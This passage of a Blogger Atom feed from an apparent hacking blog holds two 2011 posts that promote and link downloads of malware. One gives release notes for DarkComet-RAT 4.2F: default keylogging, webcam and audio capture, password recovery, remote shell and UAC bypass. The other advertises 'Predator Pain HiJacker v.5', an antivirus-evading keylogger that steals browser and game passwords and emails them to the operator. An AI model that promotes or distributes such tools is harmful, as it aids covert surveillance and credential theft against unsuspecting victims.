rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-171221351172970806</id><published>2011-12-17T03:56:00.000-08:00</published><updated>2011-12-17T03:57:27.346-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote Adminstration Tool"/><title type='text'>[RELEASE] DarkComet-RAT 4.2F Updated Bugs Fixed!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Here is the final version of 4.2 (DarkComet-RAT).&lt;br /&gt;
It is now more stable, many bugs was fix, many things had changed etc.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background-color: white; color: #3d85c6;&quot;&gt;Changelog:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;bbcode_container&quot;&gt;
&lt;div class=&quot;bbcode_quote&quot;&gt;
&lt;div class=&quot;quote_container&quot;&gt;
- Now server module doesn&#39;t melt each times&lt;br /&gt;
- SOCKS5 Server added - Multithread.&lt;br /&gt;
- Camera streaming is now more stable&lt;br /&gt;
- Camera capture interval added&lt;br /&gt;
- Camera disable streatch enabled/disabled added&lt;br /&gt;
- File Manager doesn&#39;t crash on transfer anymore&lt;br /&gt;
- Sound capture more stable and a bit faster&lt;br /&gt;
- New process manager GUI and more user friendly&lt;br /&gt;
- Process Dump added to the new process manager&lt;br /&gt;
- Screen capture totally recoded, faster in Vista and Seven than before&lt;br /&gt;
- Screen capture control more stable&lt;br /&gt;
- No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit.&lt;br /&gt;
- New password recovery plugin&lt;br /&gt;
- I change the default path of installation to bypass UAC&lt;br /&gt;
- Keylogger is now by default always enabled.&lt;br /&gt;
- Webcam streaming is faster but use more CPU (but it is faster) if you want to use less CPU you will need to play&lt;br /&gt;
with the capture interval, bigger it is in time less CPU it will consume. (nowadays computers handle perfectly this&lt;br /&gt;
calculation so it might not cause some problems brotha  )&lt;br /&gt;
- Webcam gui change, its more sex now.&lt;br /&gt;
- Webcam refresh button added if in the first time you don&#39;t receive the drivers list&lt;br /&gt;
- Remote desktop faster using another compression for picture use a little mit more CPU but faster&lt;br /&gt;
- Remote desktop now compare previous frame like in my previous versions (it use a special way that spent 0Ms to compare )&lt;br /&gt;
- Remote desktop i add as requested an option in remote command to save snapshots like for webcam
   
  &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
Bug fix:&lt;br /&gt;
&lt;div class=&quot;bbcode_container&quot;&gt;
&lt;div class=&quot;bbcode_quote&quot;&gt;
&lt;div class=&quot;quote_container&quot;&gt;
- Get keylogger logs fixed&lt;br /&gt;
- Remote shell I/O error fixed&lt;br /&gt;
- bug fixed in computer information &quot;Computer power / type&quot;&lt;br /&gt;
- Process manager bug fixed, now it list correctly all process for 64bit and refresh work properly&lt;br /&gt;
- Process memory size bug fixed&lt;br /&gt;
- Process manager run visible/hidden bug fixed. &lt;br /&gt;
- Little bug in Uninstall application fix (when there is a param merged to the uninstall string it will work  )&lt;br /&gt;
- Bug fixed in html, vbs, batch copy / past clipboard fixed&lt;br /&gt;
- Bug fixed in password manager when copy line / all in clipboard or copy only data4 column.&lt;br /&gt;
- Trace route bug fixed, now its working like a charm&lt;br /&gt;
- Now url download works fine in any case of url (i make valid your urls)&lt;br /&gt;
- No ip retrieve correctly the IP (no more 0 at the end)&lt;br /&gt;
- HWID works fine now, it will fix many errors in some functions
   
  &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
I would like to thanks especially Supersurfer beta testing also Nicolas.M.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;Few pictures :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; src=&quot;http://unremote.org/wp-content/uploads/2011/10/screen11.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;308&quot; src=&quot;http://unremote.org/wp-content/uploads/2011/10/screen21.png&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;313&quot; src=&quot;http://unremote.org/wp-content/uploads/2011/10/screen31.png&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; src=&quot;http://unremote.org/wp-content/uploads/2011/10/screen51.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download: &lt;a href=&quot;http://adf.ly/4GifS&quot; xpndit=&quot;true&quot;&gt;ClickHere&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/171221351172970806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/release-darkcomet-rat-42f-updated-bugs.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/171221351172970806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/171221351172970806'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/release-darkcomet-rat-42f-updated-bugs.html' title='[RELEASE] DarkComet-RAT 4.2F Updated Bugs Fixed!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-4907440257570735024</id><published>2011-12-11T01:15:00.001-08:00</published><updated>2011-12-11T01:17:34.245-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="FUD Crypters"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><title type='text'>[FUD]Predator Pain HiJacker v.5[Keylogger,Stealers,Easy USE,Auto Update,Encrypted]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: palegreen;&quot;&gt;Well it&#39;s been a while since i made a free logger and if you remember back in your &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; days &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Pain&lt;/span&gt; was the most widely used free logger around because it was effective and it was FUD.&lt;br /&gt;
Now the older versions are more detected than Aradamax and kinda out dated.  I recieved many PMS requesting for me to FUD &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; or make a newer updated version since it was the only free logge&lt;br /&gt;
&lt;br /&gt;
around that actually worked as described.  Well &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Pain&lt;/span&gt; is back introducing &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; Hijacker a new state of the art keylogger better than any and all free versions around find out why and this&lt;br /&gt;
time &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; Free version is here to stay.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: KgYqaA.png]&quot; border=&quot;0&quot; src=&quot;http://screensnapr.com/e/KgYqaA.png&quot; /&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: FNS0f1.png]&quot; border=&quot;0&quot; src=&quot;http://screensnapr.com/e/FNS0f1.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: PSJDb1.png]&quot; border=&quot;0&quot; src=&quot;http://screensnapr.com/e/PSJDb1.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: hgfdhgfd.png]&quot; border=&quot;0&quot; src=&quot;http://img89.imageshack.us/img89/732/hgfdhgfd.png&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
[X]Uses the best Global Hooks known to man *Keystrokes will not be an issue in this case.&lt;br /&gt;
[X]Ability to send to any Email Host *Aol, Hotmail, Googlemail, Gmail, 
Live, Yahoo, your own email server, you name it as long as you know the 
correct port and email host you can send it there.&lt;br /&gt;
[X]Encrypted Smpt Server w/ (RC4 Encryption)&lt;br /&gt;
[X]Encrypted Email w/ (RC4 Encryption)&lt;br /&gt;
[X]Encrypted Password w/ (RC4 Encryption)&lt;br /&gt;
[X]Interval (Send every X Minutes you desire)&lt;br /&gt;
[X]Ability to test your email make sure everything is correct&lt;br /&gt;
[X]Add to Startup&lt;br /&gt;
[X]Bypass UAC&lt;br /&gt;
[X]Notify Email&lt;br /&gt;
[X]Clipboard Logger&lt;br /&gt;
[X]Screenshot Logger&lt;br /&gt;
[X]File Downloader&lt;br /&gt;
[X]Fake Error Message&lt;br /&gt;
[X]Assembly Change&lt;br /&gt;
&lt;br /&gt;
[X]Icon Change&lt;br /&gt;
&lt;br /&gt;
[X]File Pumper&lt;br /&gt;
[X]Auto Updater:  Contains an auto updater everytime a new version is 
avaliable it will delete this version and send you a new version to 
download this is to fix bugs if any are found, new features, and FUD 
Updates on a weekly update.&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Predator&lt;/span&gt; &lt;span class=&quot;highlight&quot; style=&quot;padding-left: 0px; padding-right: 0px;&quot;&gt;Pain&lt;/span&gt;
 Hijacker is the only Free Logger on HF that steals the newest web 
broswers avaliable how great is that i was debating whether or not to 
add these features but decided why not i haven&#39;t made a new logger in a 
long time.&lt;br /&gt;
&lt;br /&gt;
Stealers:&lt;br /&gt;
&lt;br /&gt;
[X]Firefox (Newest and Older Versions) *Steals all versions of Firefox 3.x.x., 4.x.x., 5.x.x.&lt;br /&gt;
[X]Internet Explorer (Newest and Older Versions) *Steals all versions of IE 6.x,7.x,8.x,9.x&lt;br /&gt;
[X]Opera (Newest and Older Versions) *Steals all versions of Opera 10 and 11&lt;br /&gt;
[X]Google Chrome (Newest and Older Versions) *Steals all Versions of Google chrome old to newest&lt;br /&gt;
[X]Minecraft - *What MINECRAFT STEALER?  Yes, i added Minecraft was 
debating whether or not to make it runescape took me 20 minutes to 
figure it out then i decided Runescape is worth more so ill make it 
Minecraft.  All versions of Runescape are avaliable on Private Version&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: palegreen;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: palegreen;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;codeblock&quot;&gt;

&lt;div class=&quot;title&quot;&gt;
Code:&lt;br /&gt;
&lt;/div&gt;
&lt;div class=&quot;body&quot; dir=&quot;ltr&quot;&gt;
&lt;code&gt;&lt;a href=&quot;http://adf.ly/49xVJ&quot; xpndit=&quot;true&quot;&gt;Download &lt;/a&gt;&lt;/code&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;color: palegreen;&quot;&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: palegreen;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/4907440257570735024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/fudpredator-pain-hijacker.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4907440257570735024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4907440257570735024'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/fudpredator-pain-hijacker.html' title='[FUD]Predator Pain HiJacker v.5[Keylogger,Stealers,Easy USE,Auto Update,Encrypted]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry></feed>